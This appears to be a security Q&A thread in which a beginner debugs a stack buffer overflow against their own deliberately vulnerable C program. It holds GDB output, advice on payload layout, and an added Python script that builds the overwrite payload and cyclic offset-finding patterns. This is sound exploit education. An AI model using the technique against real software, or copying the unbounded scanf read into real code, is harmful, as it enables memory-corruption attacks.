
I'm a beginner in exploits, so I typed a simple program in C:

#include <stdio.h>

/* Target function: main() never calls it; it is reached only by
   overwriting the saved return address on the stack. */
void func(){
    printf("asd");   /* no newline: stdout may stay buffered if the process crashes afterwards */
}

int main(void){
    char buf[100];
    scanf("%s", buf);   /* unbounded read into a 100-byte stack buffer: the intended overflow */
    return 0;
}

My goal is to run func() and print asd. With 116 'A's I'm overwriting the EIP, but when I replace the last 4 A's with the memory address of the function (in reverse order) and run the program again, the EIP is something completely different. Here are the details from GDB:

Starting program: /root/Documents/C/overflow/stack 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers
eax            0x1  1
ecx            0x1  1
edx            0xb7fbd354   -1208233132
ebx            0xb7fbbff4   -1208238092
esp            0xbffff4d0   0xbffff4d0
ebp            0x41414141   0x41414141
esi            0x0  0
edi            0x0  0
eip            0x41414141   0x41414141

With address of the func:

(gdb) disas func
Dump of assembler code for function func:
   0x0804846c <+0>: push   %ebp
   0x0804846d <+1>: mov    %esp,%ebp
   0x0804846f <+3>: sub    $0x18,%esp
   0x08048472 <+6>: movl   $0x8048530,(%esp)
   0x08048479 <+13>:    call   0x8048340 <printf@plt>
   0x0804847e <+18>:    leave  
   0x0804847f <+19>:    ret 

Starting program: /root/Documents/C/overflow/stack 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x6c\x84\x04\x08

Program received signal SIGSEGV, Segmentation fault.
0x6336785c in ?? ()

If I add more A's to the string, the EIP starts filling with A's again, I mean:

Adding 1 A EIP = 0x36785c41
Adding 2 A's EIP = 0x785c4141
Adding 3 A's EIP = 0x78414141
Adding 4 A's EIP = 0x41414141

I'm running Linux; I didn't remove or edit anything in the kernel, so there may be protections. Also I didn't disable any function in gcc, and the compiler is gcc =D.

Any help is welcome. Thanks in advance.

Use the pattern_create.rb and pattern_offset.rb scripts in Metasploit for exactly finding the length of the buffer overwriting the EIP. You mentioned that EIP is overwritten by 116 A's even though the number of A's in the first example is 118 that is why pattern_offset is going to tell you the exact length of the pattern needed. –  void_in May 5 '14 at 5:03

1 Answer

I could successfully exploit the buffer overflow. Your exploit code is wrong.

You are passing the address of func() as it is, in hex form. You need to first convert \x6c\x84\x04\x08 into ASCII; using Python you can do it.

On my system it comes out to be lä♦

Exploit should be B1=AAAA... (size of buffer, 120 in my case)

B2=BBBB....(override ebp)

R.A. of func()=lä♦

exploit =B1+B2+lä♦

Also set the gdb syntax to intel for better readability.

Always check out EBP to see if size of exploit code is correct.

In this case, if EBP=42424242 that means the number of A's is correct, that is, we are moving in the right direction.

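As an added, illustrative example (not code from the question or the answer above): the Python script below builds the payload as raw bytes with struct.pack, reproduces why the escape text typed literally on the command line produced EIP = 0x6336785c (the saved-EIP slot received the four ASCII characters backslash, x, 6, c), and includes a minimal equivalent of the pattern_create.rb / pattern_offset.rb scripts mentioned in the comment under the question. The function address 0x0804846c is taken from the disassembly in the question; the padding length of 112 bytes and all function names are assumptions of this example.

```python
import string
import struct
import sys

# Values taken from the question: address of func from "disas func" and the
# number of padding bytes before the saved return address (assumed here to be
# 112, the run of 'A's in front of "\x6c\x84\x04\x08" in the second GDB run).
FUNC_ADDR = 0x0804846C
OFFSET = 112


def make_payload(offset, target, pad=b"A"):
    """Padding followed by the target address as raw little-endian bytes."""
    return pad * offset + struct.pack("<I", target)


def make_literal_payload(offset, target, pad=b"A"):
    """The mistake from the question: the escape text sent as plain ASCII."""
    escaped = "".join("\\x%02x" % b for b in struct.pack("<I", target))
    return pad * offset + escaped.encode("ascii")


def eip_after_overflow(payload, offset):
    """Simulate the 'ret': the 4 bytes at the saved-EIP slot, read little-endian.
    Returns None when the payload is too short to reach the slot."""
    slot = payload[offset:offset + 4]
    if len(slot) < 4:
        return None
    return struct.unpack("<I", slot)[0]


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...); within its first 20280
    bytes every 4-byte window is unique, so a crash value maps to one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, eip_value):
    """Offset at which the crashing EIP value (little-endian) sits in the
    pattern, or -1 if it is not part of the pattern."""
    return pattern.find(struct.pack("<I", eip_value))


if __name__ == "__main__":
    # Raw bytes must reach the program's stdin unmodified, for example:
    #   python exploit.py > payload.bin ; ./stack < payload.bin
    # or inside gdb:  run < payload.bin
    sys.stdout.buffer.write(make_payload(OFFSET, FUNC_ADDR))
```

Running the script with the literal payload instead reproduces the sequence from the question: prepending one, two and four extra 'A's to make_literal_payload() yields 0x36785c41, 0x785c4141 and 0x41414141 in the simulated EIP, because each extra byte shifts which four characters of the typed text land in the return-address slot. To find the offset in the first place, feed pattern_create() output to the binary, take the EIP value GDB reports at the crash, and pass it to pattern_offset(). Note that the question's first GDB run already shows EIP = 0x41414141, so gcc's stack protector is not stopping the overwrite on that binary; on a build where it is enabled, the canary check aborts the process before the ret executes and this approach does not work unchanged.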
